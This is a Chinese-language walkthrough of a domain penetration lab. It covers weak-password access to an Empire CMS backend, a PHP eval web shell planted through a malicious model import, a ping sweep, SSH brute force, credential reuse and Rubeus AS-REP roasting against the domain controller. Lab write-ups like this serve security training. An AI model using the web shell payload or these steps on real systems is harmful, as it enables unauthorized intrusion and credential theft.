文章总结： 文档记录了一次域环境渗透靶场实战。入口为帝国CMS后台弱口令，通过导入恶意模型文件获取Webshell。随后利用代理进行内网探测，通过SSH爆破拿下Linux主机，并读取配置文件获取凭据横向移动至Windows主机。最终利用AS-REPRoasting技术破解Hash，完成域控攻击。内容涵盖Web渗透、内网扫描与横向移动等关键步骤。 综合评分： 75 文章分类： 渗透测试,内网渗透,红队,实战经验

域环境渗透lab17wp

原创

plag plag

红队蓝军

2026年3月3日 14:01 四川

入口

访问80端口是adminer，打了半天没打出来

根据提示

扫描端口发现8001端口可利用，帝国cms

/e/admin路径，admin/admin123进后台

点击导入系统模型

准备一个1.php.mod

ounter(line<?php fileputcontents(“getshell.php”,”<?php @eval(\$_POST[cmd]); ?>“);?>

表名随便填

蚁剑连接

获取flag

第二台机器

做代理

ifconfig查看ip为双网卡

编写脚本进行探测，发现172.20.5.9有主机存活，根据ttl=64判断可能为linux

ounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(line#!/bin/sh

i=1while [ $i -le 254 ]; do  ping -c 1 172.20.5.$i  i=`expr $i + 1`done./1.sh > /tmp/2.txt

使用弱口令爆破工具得到密码password

获取flag

第三台机器

信息收集

发现存活主机10.200.5.50

查看etc/passwd的拿到用户root密码

扫描10.200.5.50发现3389端口开启

后面发现这个密码就是10.200.5.50的administrator用户的密码

获取flag

DC

用asreproast破解hash

ounter(lineounter(linerunas /user:cyberstrike.lab\cslab cmd

Rubeus.exe asreproast

靶场地址：https://www.cyberstrikelab.com/#/scene/detail/52

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：红队蓝军 plag plag《域环境渗透lab17wp》